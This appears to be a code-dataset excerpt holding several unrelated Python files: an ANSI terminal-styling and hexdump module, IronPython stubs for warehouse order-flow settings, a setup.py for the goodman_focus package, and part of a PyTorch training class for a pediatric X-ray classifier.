(sys.print_exception)\
(e, _stream)
Also you may use it as decorator function."""
def decorator(func):
def wrapper(*args, **kwds):
ascii_str = _names2ascii(fg, stylename, bg)
stream.write(ascii_str)
func(*args, **kwds)
stream.write(_style_dict["reset"])
return wrapper
return decorator
def _chunks(l: bytearray, n: int):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def hexdump(bytebuffer: bytearray, offset: int = 0):
"""Print hexdump of bytearray from offset"""
for i, chunk in enumerate(_chunks(bytebuffer, 16)):
print("%08X: " % (i * 16 + offset), end="")
for byte in chunk[:8]:
print('%02X ' % byte, end="")
print(' ', end="")
for byte in chunk[8:]:
print('%02X ' % byte, end="")
for k in range(16 - len(chunk)):
print('%2s ' % " ", end="")
print(' | ', end="")
for byte in chunk:
if 0x20 <= byte <= 0x7F:
print("%c" % chr(byte), end="")
else:
print(".", end="")
print() | stylization/stylization.py | import sys
_style_dict = {
"reset": "\033[0m",
"bold": "\033[01m",
"disable": '\033[02m',
"underline": '\033[04m',
"reverse": '\033[07m',
"strikethrough": '\033[09m',
"invisible": '\033[08m'
}
_fg_dict = {
"black": "\033[30m",
"red": "\033[31m",
"green": "\033[32m",
"orange": "\033[33m",
"blue": "\033[34m",
"purple": "\033[35m",
"cyan": "\033[36m",
"lightgrey": "\033[37m",
"darkgrey": "\033[90m",
"lightred": "\033[91m",
"lightgreen": "\033[92m",
"yellow": "\033[93m",
"lightblue": "\033[94m",
"pink": "\033[95m",
"lightcyan": "\033[96m"
}
_bg_dict = {
"black": "\033[40m",
"red": "\033[41m",
"green": "\033[42m",
"orange": "\033[43m",
"blue": "\033[44m",
"purple": "\033[45m",
"cyan": "\033[46m",
"lightgrey": "\033[47m"
}
def _names2ascii(fg=None, stylename=None, bg=None) -> str:
"""Convert names of foreground, styles and background to ASCII symbols string"""
fg_string = _fg_dict[fg] if fg is not None else ""
bg_string = _bg_dict[bg] if bg is not None else ""
st_string = ""
if stylename is not None:
style_list = stylename.split(" ")
for style_item in style_list:
st_string = "".join((st_string, _style_dict[style_item]))
st_bg_fg_str = "".join((
st_string,
fg_string,
bg_string))
return st_bg_fg_str
def style_string(string: str, fg=None, stylename=None, bg=None) -> str:
"""Apply styles to text.
It is able to change style (like bold, underline etc), foreground and background colors of text string."""
ascii_str = _names2ascii(fg, stylename, bg)
return "".join((
ascii_str,
string,
_style_dict["reset"]))
def style_func_stream(stream=sys.stdout, fg=None, stylename=None, bg=None):
"""Apply styles to stream and call the .
It is able to change style (like bold, underline etc), foreground and background colors of text string.
Example usage:
style_stream(_stream, fg=fg, stylename=stylename,bg=bg)\
(sys.print_exception)\
(e, _stream)
Also you may use it as decorator function."""
def decorator(func):
def wrapper(*args, **kwds):
ascii_str = _names2ascii(fg, stylename, bg)
stream.write(ascii_str)
func(*args, **kwds)
stream.write(_style_dict["reset"])
return wrapper
return decorator
def _chunks(l: bytearray, n: int):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def hexdump(bytebuffer: bytearray, offset: int = 0):
"""Print hexdump of bytearray from offset"""
for i, chunk in enumerate(_chunks(bytebuffer, 16)):
print("%08X: " % (i * 16 + offset), end="")
for byte in chunk[:8]:
print('%02X ' % byte, end="")
print(' ', end="")
for byte in chunk[8:]:
print('%02X ' % byte, end="")
for k in range(16 - len(chunk)):
print('%2s ' % " ", end="")
print(' | ', end="")
for byte in chunk:
if 0x20 <= byte <= 0x7F:
print("%c" % chr(byte), end="")
else:
print(".", end="")
print() | 0.434941 | 0.234752 |
from __init__ import *
# no functions
# classes
class MyList(FindableList):
""" MyList() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return MyList()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def ToString(self):
""" ToString(self: MyList) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass
class OrderFlowLink(object):
""" OrderFlowLink(orderFlowOption: OrderFlowOption,orderSelectionCode: str,orderSelectionDescription: str,Color: str) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowLink()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def __new__(self,orderFlowOption,orderSelectionCode,orderSelectionDescription,Color):
""" __new__(cls: type,orderFlowOption: OrderFlowOption,orderSelectionCode: str,orderSelectionDescription: str,Color: str) """
pass
Color=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Color(self: OrderFlowLink) -> str
Set: Color(self: OrderFlowLink)=value
"""
OrderFlowOption=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderFlowOption(self: OrderFlowLink) -> OrderFlowOption
Set: OrderFlowOption(self: OrderFlowLink)=value
"""
OrderSelectionCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderSelectionCode(self: OrderFlowLink) -> str
Set: OrderSelectionCode(self: OrderFlowLink)=value
"""
OrderSelectionDescription=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderSelectionDescription(self: OrderFlowLink) -> str
Set: OrderSelectionDescription(self: OrderFlowLink)=value
"""
class OrderFlowLinks(List):
""" OrderFlowLinks() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowLinks()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def DeleteLinksThatAreNotEqual(self,SelectionCodes):
""" DeleteLinksThatAreNotEqual(self: OrderFlowLinks,SelectionCodes: Array[str]) """
pass
def GetLinkBySelectionCode(self,Code):
""" GetLinkBySelectionCode(self: OrderFlowLinks,Code: str) -> OrderFlowLink """
pass
def ToString(self):
""" ToString(self: OrderFlowLinks) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass
class OrderFlowOption:
""" enum OrderFlowOption,values: FulFill (2),FulFillPrintInvoice (1),PrintInvoiceFulFill (0) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowOption()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
FulFill=None
FulFillPrintInvoice=None
PrintInvoiceFulFill=None
value__=None
class ShippperServiceLink(object):
""" ShippperServiceLink(ShipperId: str,ServiceId: str,DeliveryMethodCode: str,DeliveryMethodName: str,Color: str) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ShippperServiceLink()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def __new__(self,ShipperId,ServiceId,DeliveryMethodCode,DeliveryMethodName,Color):
""" __new__(cls: type,ShipperId: str,ServiceId: str,DeliveryMethodCode: str,DeliveryMethodName: str,Color: str) """
pass
Color=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Color(self: ShippperServiceLink) -> str
Set: Color(self: ShippperServiceLink)=value
"""
DeliveryMethodCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: DeliveryMethodCode(self: ShippperServiceLink) -> str
Set: DeliveryMethodCode(self: ShippperServiceLink)=value
"""
DeliveryMethodName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: DeliveryMethodName(self: ShippperServiceLink) -> str
Set: DeliveryMethodName(self: ShippperServiceLink)=value
"""
Enabled=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Enabled(self: ShippperServiceLink) -> bool
Set: Enabled(self: ShippperServiceLink)=value
"""
ServiceId=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: ServiceId(self: ShippperServiceLink) -> str
Set: ServiceId(self: ShippperServiceLink)=value
"""
ShipperId=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: ShipperId(self: ShippperServiceLink) -> str
Set: ShipperId(self: ShippperServiceLink)=value
"""
class ShippperServiceLinks(List):
""" ShippperServiceLinks() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ShippperServiceLinks()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def DeliveryMethodCodes(self):
""" DeliveryMethodCodes(self: ShippperServiceLinks) -> List[str] """
pass
def DisableLinksWithServiceIds(self,ServiceIds):
""" DisableLinksWithServiceIds(self: ShippperServiceLinks,ServiceIds: List[str]) """
pass
def GetByDeliveryMethodCode(self,DeliveryMethodCode):
""" GetByDeliveryMethodCode(self: ShippperServiceLinks,DeliveryMethodCode: str) -> ShippperServiceLink """
pass
def GetColorForService(self,ServiceId):
""" GetColorForService(self: ShippperServiceLinks,ServiceId: str) -> str """
pass
def ServiceIds(self,ShipperId):
""" ServiceIds(self: ShippperServiceLinks,ShipperId: str) -> List[str] """
pass
def ShipperIds(self):
""" ShipperIds(self: ShippperServiceLinks) -> List[str] """
pass
def ToString(self):
""" ToString(self: ShippperServiceLinks) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass | release/stubs.min/Wms/RemotingObjects/Settings/SettingObjects.py | from __init__ import *
# no functions
# classes
class MyList(FindableList):
""" MyList() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return MyList()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def ToString(self):
""" ToString(self: MyList) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass
class OrderFlowLink(object):
""" OrderFlowLink(orderFlowOption: OrderFlowOption,orderSelectionCode: str,orderSelectionDescription: str,Color: str) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowLink()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def __new__(self,orderFlowOption,orderSelectionCode,orderSelectionDescription,Color):
""" __new__(cls: type,orderFlowOption: OrderFlowOption,orderSelectionCode: str,orderSelectionDescription: str,Color: str) """
pass
Color=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Color(self: OrderFlowLink) -> str
Set: Color(self: OrderFlowLink)=value
"""
OrderFlowOption=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderFlowOption(self: OrderFlowLink) -> OrderFlowOption
Set: OrderFlowOption(self: OrderFlowLink)=value
"""
OrderSelectionCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderSelectionCode(self: OrderFlowLink) -> str
Set: OrderSelectionCode(self: OrderFlowLink)=value
"""
OrderSelectionDescription=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: OrderSelectionDescription(self: OrderFlowLink) -> str
Set: OrderSelectionDescription(self: OrderFlowLink)=value
"""
class OrderFlowLinks(List):
""" OrderFlowLinks() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowLinks()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def DeleteLinksThatAreNotEqual(self,SelectionCodes):
""" DeleteLinksThatAreNotEqual(self: OrderFlowLinks,SelectionCodes: Array[str]) """
pass
def GetLinkBySelectionCode(self,Code):
""" GetLinkBySelectionCode(self: OrderFlowLinks,Code: str) -> OrderFlowLink """
pass
def ToString(self):
""" ToString(self: OrderFlowLinks) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass
class OrderFlowOption:
""" enum OrderFlowOption,values: FulFill (2),FulFillPrintInvoice (1),PrintInvoiceFulFill (0) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return OrderFlowOption()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
FulFill=None
FulFillPrintInvoice=None
PrintInvoiceFulFill=None
value__=None
class ShippperServiceLink(object):
""" ShippperServiceLink(ShipperId: str,ServiceId: str,DeliveryMethodCode: str,DeliveryMethodName: str,Color: str) """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ShippperServiceLink()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def __new__(self,ShipperId,ServiceId,DeliveryMethodCode,DeliveryMethodName,Color):
""" __new__(cls: type,ShipperId: str,ServiceId: str,DeliveryMethodCode: str,DeliveryMethodName: str,Color: str) """
pass
Color=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Color(self: ShippperServiceLink) -> str
Set: Color(self: ShippperServiceLink)=value
"""
DeliveryMethodCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: DeliveryMethodCode(self: ShippperServiceLink) -> str
Set: DeliveryMethodCode(self: ShippperServiceLink)=value
"""
DeliveryMethodName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: DeliveryMethodName(self: ShippperServiceLink) -> str
Set: DeliveryMethodName(self: ShippperServiceLink)=value
"""
Enabled=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: Enabled(self: ShippperServiceLink) -> bool
Set: Enabled(self: ShippperServiceLink)=value
"""
ServiceId=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: ServiceId(self: ShippperServiceLink) -> str
Set: ServiceId(self: ShippperServiceLink)=value
"""
ShipperId=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""
Get: ShipperId(self: ShippperServiceLink) -> str
Set: ShipperId(self: ShippperServiceLink)=value
"""
class ShippperServiceLinks(List):
""" ShippperServiceLinks() """
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ShippperServiceLinks()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
def DeliveryMethodCodes(self):
""" DeliveryMethodCodes(self: ShippperServiceLinks) -> List[str] """
pass
def DisableLinksWithServiceIds(self,ServiceIds):
""" DisableLinksWithServiceIds(self: ShippperServiceLinks,ServiceIds: List[str]) """
pass
def GetByDeliveryMethodCode(self,DeliveryMethodCode):
""" GetByDeliveryMethodCode(self: ShippperServiceLinks,DeliveryMethodCode: str) -> ShippperServiceLink """
pass
def GetColorForService(self,ServiceId):
""" GetColorForService(self: ShippperServiceLinks,ServiceId: str) -> str """
pass
def ServiceIds(self,ShipperId):
""" ServiceIds(self: ShippperServiceLinks,ShipperId: str) -> List[str] """
pass
def ShipperIds(self):
""" ShipperIds(self: ShippperServiceLinks) -> List[str] """
pass
def ToString(self):
""" ToString(self: ShippperServiceLinks) -> str """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __reduce_ex__(self,*args):
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
def __str__(self,*args):
pass | 0.637934 | 0.113653 |
import os
from codecs import open
from setuptools import setup
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
CONF = ConfigParser()
HERE = os.path.abspath(os.path.dirname(__file__))
def create_version_py(packagename, version, source_dir='.'):
package_dir = os.path.join(source_dir, packagename)
version_py = os.path.join(package_dir, 'version.py')
version_str = "# This is an automatic generated file please do not edit\n" \
"__version__ = '{:s}'".format(version)
with open(version_py, 'w') as f:
f.write(version_str)
# read content from README.md
with open(os.path.join(HERE, 'README.md')) as f:
long_description = f.read()
CONF.read([os.path.join(os.path.dirname(__file__), 'setup.cfg')])
metadata = dict(CONF.items('metadata'))
PACKAGENAME = metadata['package_name']
VERSION = metadata['version']
LICENSE = metadata['license']
DESCRIPTION = metadata['description']
LONG_DESCRIPTION = long_description
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
AUTHOR = metadata['author']
AUTHOR_EMAIL = metadata['author_email']
INSTALL_REQUIRES = metadata['install_requires'].split()
# freezes version information in version.py
create_version_py(PACKAGENAME, VERSION)
setup(
name=metadata['package_name'],
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
# The project's main homepage.
url='https://github.com/soar-telescope/goodman_focus',
# Author details
author=u'<NAME>., ',
author_email='<EMAIL>',
# Choose your license
license=LICENSE,
packages=['goodman_focus'],
package_dir={'goodman_focus': 'goodman_focus'},
python_requires=">=3.6",
install_requires=INSTALL_REQUIRES,
entry_points={
'console_scripts': [
'goodman-focus=goodman_focus.goodman_focus:run_goodman_focus',
]
}
) | setup.py | import os
from codecs import open
from setuptools import setup
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
CONF = ConfigParser()
HERE = os.path.abspath(os.path.dirname(__file__))
def create_version_py(packagename, version, source_dir='.'):
package_dir = os.path.join(source_dir, packagename)
version_py = os.path.join(package_dir, 'version.py')
version_str = "# This is an automatic generated file please do not edit\n" \
"__version__ = '{:s}'".format(version)
with open(version_py, 'w') as f:
f.write(version_str)
# read content from README.md
with open(os.path.join(HERE, 'README.md')) as f:
long_description = f.read()
CONF.read([os.path.join(os.path.dirname(__file__), 'setup.cfg')])
metadata = dict(CONF.items('metadata'))
PACKAGENAME = metadata['package_name']
VERSION = metadata['version']
LICENSE = metadata['license']
DESCRIPTION = metadata['description']
LONG_DESCRIPTION = long_description
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
AUTHOR = metadata['author']
AUTHOR_EMAIL = metadata['author_email']
INSTALL_REQUIRES = metadata['install_requires'].split()
# freezes version information in version.py
create_version_py(PACKAGENAME, VERSION)
setup(
name=metadata['package_name'],
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
# The project's main homepage.
url='https://github.com/soar-telescope/goodman_focus',
# Author details
author=u'<NAME>., ',
author_email='<EMAIL>',
# Choose your license
license=LICENSE,
packages=['goodman_focus'],
package_dir={'goodman_focus': 'goodman_focus'},
python_requires=">=3.6",
install_requires=INSTALL_REQUIRES,
entry_points={
'console_scripts': [
'goodman-focus=goodman_focus.goodman_focus:run_goodman_focus',
]
}
) | 0.269422 | 0.102305 |
import torch.nn as nn
import numpy as np
import time
import cv2
import os
import shutil
import tqdm
import torch
import wandb
from utils.metrics import AUC
from data.utils import transform
from model.models import Stacking, save_dense_backbone, load_dense_backbone, save_resnet_backbone, load_resnet_backbone, Ensemble, AverageMeter
from model.utils import get_models, get_str, tensor2numpy, get_optimizer, load_ckp, lrfn, get_metrics, get_device
from utils.confidence_interval import boostrap_ci
class Pediatric_Classifier():
def __init__(self, cfg, loss_func, metrics=None):
"""Pediatric_Classifier class used to train and evaluate model performance
Args:
cfg: contain configuration.
loss_func: Loss function.
metrics (dict, optional): dictionary contains evaluation metrics. Defaults to None.
"""
self.cfg = cfg
if self.cfg.type == 'pediatric':
self.cfg.num_classes = 13*[1]
elif self.cfg.type == 'chexmic':
self.cfg.num_classes = 14*[1]
else:
self.cfg.num_classes = [1]
self.device = get_device(self.cfg.device)
self.model = get_models(self.cfg)
if self.cfg.ensemble == 'stacking':
self.stacking_model = Stacking(len(self.model))
if os.path.isfile(self.cfg.ckp_stack):
self.stacking_model.load_state_dict(torch.load(
self.cfg.ckp_stack, map_location=torch.device("cpu")))
self.stacking_model.to(self.device)
self.stacking_model.freeze()
self.loss_func = loss_func
if metrics is not None:
self.metrics = metrics
self.metrics['loss'] = self.loss_func
else:
self.metrics = {'loss': self.loss_func}
if cfg.parallel:
self.model = torch.nn.DataParallel(self.model)
self.model.to(self.device)
self.thresh_val = torch.Tensor(
[0.5]*len(self.cfg.num_classes)).float().to(self.device)
def save_backbone(self, ckp_path):
"""
Save model backbone to ckp_path.
"""
if self.cfg.parallel:
model_part = self.model.module
else:
model_part = self.model
if self.cfg.backbone == 'dense' or self.cfg.backbone == 'densenet':
save_dense_backbone(model_part, ckp_path)
elif self.cfg.backbone == 'resnet':
save_resnet_backbone(model_part, ckp_path)
def load_backbone(self, ckp_path, strict=True):
"""
Load model backbone to ckp_path.
"""
if self.cfg.parallel:
model_part = self.model.module
else:
model_part = self.model
if self.cfg.backbone == 'dense' or self.cfg.backbone == 'densenet':
load_dense_backbone(model_part, ckp_path, self.device, strict)
elif self.cfg.backbone == 'resnet':
load_resnet_backbone(model_part, ckp_path, self.device, strict)
def load_ckp(self, ckp_path, strict=True):
"""
Load model from ckp_path.
"""
return load_ckp(self.model, ckp_path, self.device, self.cfg.parallel, strict)
def save_ckp(self, ckp_path, epoch, iter):
"""
Save model to ckp_path.
"""
if os.path.exists(os.path.dirname(ckp_path)):
torch.save(
{'epoch': epoch+1,
'iter': iter+1,
'state_dict': self.model.module.state_dict() if self.cfg.parallel else self.model.state_dict()},
ckp_path
)
else:
print("Save path not exist!!!")
def predict(self, image):
"""Run prediction
Args:
image (torch.Tensor): images to predict. Shape (batch size, C, H, W)
Returns:
torch.Tensor: model prediction
"""
self.model.eval()
with torch.no_grad() as tng:
preds = self.model(image)
if not isinstance(self.model, Ensemble) and self.cfg.ensemble == 'none':
preds = nn.Sigmoid()(preds)
elif self.cfg.ensemble == 'average':
preds = preds.mean(-1)
elif self.cfg.ensemble == 'stacking':
preds = self.stacking_model(preds)
return preds
def predict_from_file(self, image_file):
"""Run prediction from image path
Args:
image_file (str): image path
Returns:
numpy array: model prediction in numpy array type
"""
image_gray = cv2.imread(image_file, 0)
image = transform(image_gray, self.cfg)
image = torch.from_numpy(image)
image = image.unsqueeze(0)
return tensor2numpy(nn.Sigmoid()(self.predict(image)))
def predict_loader(self, loader, cal_loss=False):
"""Run prediction on a given dataloader.
Args:
loader (torch.utils.data.Dataloader): a dataloader
cal_loss (bool): whether to calculate the loss. Defaults to True
Returns:
torch.Tensor, torch.Tensor, torch.Tensor: prediction, labels, loss value
"""
preds_stack = []
labels_stack = []
running_loss = AverageMeter()
ova_len = loader.dataset.n_data
loop = tqdm.tqdm(enumerate(loader), total=len(loader))
for i, data in loop:
imgs, labels = data[0].to(self.device), data[1].to(self.device)
if self.cfg.tta:
# imgs = torch.cat(imgs, dim=0)
list_imgs = [imgs[:, j] for j in range(imgs.shape[1])]
imgs = torch.cat(list_imgs, dim=0)
preds = self.predict(imgs)
batch_len = labels.shape[0]
list_preds = [preds[batch_len*j:batch_len *
(j+1)] for j in range(len(list_imgs))]
preds = torch.stack(list_preds, dim=0).mean(dim=0)
else:
preds = self.predict(imgs)
preds_stack.append(preds)
labels_stack.append(labels)
if cal_loss:
# running_loss.append(self.metrics['loss'](
# preds, labels).item()*iter_len/ova_len)
running_loss.update(self.metrics['loss'](
preds, labels).item(), imgs.shape[0])
preds_stack = torch.cat(preds_stack, 0)
labels_stack = torch.cat(labels_stack, 0)
return preds_stack, labels_stack, running_loss.avg
def train(self, train_loader, val_loader, epochs=10, iter_log=100, use_lr_sch=False, resume=False, ckp_dir='./experiment/checkpoint',
eval_metric='auc'):
"""Run training
Args:
train_loader (torch.utils.data.Dataloader): dataloader use for training
val_loader (torch.utils.data.Dataloader): dataloader use for validation
epochs (int, optional): number of training epochs. Defaults to 120.
iter_log (int, optional): logging iteration. Defaults to 100.
use_lr_sch (bool, optional): use learning rate scheduler. Defaults to False.
resume (bool, optional): resume training process. Defaults to False.
ckp_dir (str, optional): path to checkpoint directory. Defaults to './experiment/checkpoint'.
eval_metric (str, optional): name of metric for validation. Defaults to 'loss'.
"""
wandb.init(name=self.cfg.log_dir,
project='Pediatric Multi-label Classifier')
optimizer = get_optimizer(self.model.parameters(), self.cfg)
if use_lr_sch:
lr_sch = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lrfn)
lr_hist = []
else:
lr_sch = None
best_metric = 0.0
if os.path.exists(ckp_dir) != True:
os.mkdir(ckp_dir)
if resume:
epoch_resume, iter_resume = self.load_ckp(
os.path.join(ckp_dir, 'latest.ckpt'))
else:
epoch_resume = 1
iter_resume = 0
scaler = None
if self.cfg.mix_precision:
print('Train with mix precision!')
scaler = torch.cuda.amp.GradScaler()
for epoch in range(epoch_resume-1, epochs):
start = time.time()
running_loss = AverageMeter()
n_iter = len(train_loader)
torch.set_grad_enabled(True)
self.model.train()
batch_weights = (1/iter_log)*np.ones(n_iter)
step_per_epoch = n_iter // iter_log
if n_iter % iter_log:
step_per_epoch += 1
batch_weights[-(n_iter % iter_log):] = 1 / (n_iter % iter_log)
iter_per_step = iter_log * \
np.ones(step_per_epoch, dtype=np.int16)
iter_per_step[-1] = n_iter % iter_log
else:
iter_per_step = iter_log * \
np.ones(step_per_epoch, dtype=np.int16)
i = 0
for step in range(step_per_epoch):
loop = tqdm.tqdm(
range(iter_per_step[step]), total=iter_per_step[step])
iter_loader = iter(train_loader)
for iteration in loop:
data = next(iter_loader)
imgs, labels = data[0].to(
self.device), data[1].to(self.device)
if self.cfg.mix_precision:
with torch.cuda.amp.autocast():
preds = self.model(imgs)
loss = self.metrics['loss'](preds, labels)
else:
preds = self.model(imgs)
loss = self.metrics['loss'](preds, labels)
preds = nn.Sigmoid()(preds)
running_loss.update(loss.item(), imgs.shape[0])
optimizer.zero_grad()
if self.cfg.mix_precision:
scaler.scale(loss).backward()
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
optimizer.step()
i += 1
if wandb:
wandb.log(
{'loss/train': running_loss.avg}, step=(epoch*n_iter)+(i+1))
s = "Epoch [{}/{}] Iter [{}/{}]:\n".format(
epoch+1, epochs, i+1, n_iter)
s += "{}_{} {:.3f}\n".format('train', 'loss', running_loss.avg)
running_metrics_test = self.test(
val_loader, False)
torch.set_grad_enabled(True)
self.model.train()
s = get_str(running_metrics_test, 'val', s)
if wandb:
for key in running_metrics_test.keys():
if key != 'loss':
for j, disease_class in enumerate(np.array(train_loader.dataset.disease_classes)):
wandb.log(
{key+'/'+disease_class: running_metrics_test[key][j]}, step=(epoch*n_iter)+(i+1))
else:
wandb.log(
{'loss/val': running_metrics_test['loss']}, step=(epoch*n_iter)+(i+1))
if self.cfg.type != 'chexmic':
metric_eval = running_metrics_test[eval_metric]
else:
metric_eval = running_metrics_test[eval_metric][self.id_obs]
s = s[:-1] + "- mean_"+eval_metric + \
" {:.3f}".format(metric_eval.mean())
self.save_ckp(os.path.join(
ckp_dir, 'latest.ckpt'), epoch, i)
running_loss.reset()
end = time.time()
s += " ({:.1f}s)".format(end-start)
print(s)
if metric_eval.mean() > best_metric:
best_metric = metric_eval.mean()
shutil.copyfile(os.path.join(ckp_dir, 'latest.ckpt'), os.path.join(
ckp_dir, 'best.ckpt'))
print('new checkpoint saved!')
start = time.time()
if lr_sch is not None:
lr_sch.step()
print('current lr: {:.4f}'.format(lr_sch.get_lr()[0]))
if lr_sch is not None:
return lr_hist
else:
return None
def test(self, loader, get_ci=False, n_boostrap=10000):
"""Run testing
Args:
loader (torch.utils.data.Dataloader): dataloader use for testing.
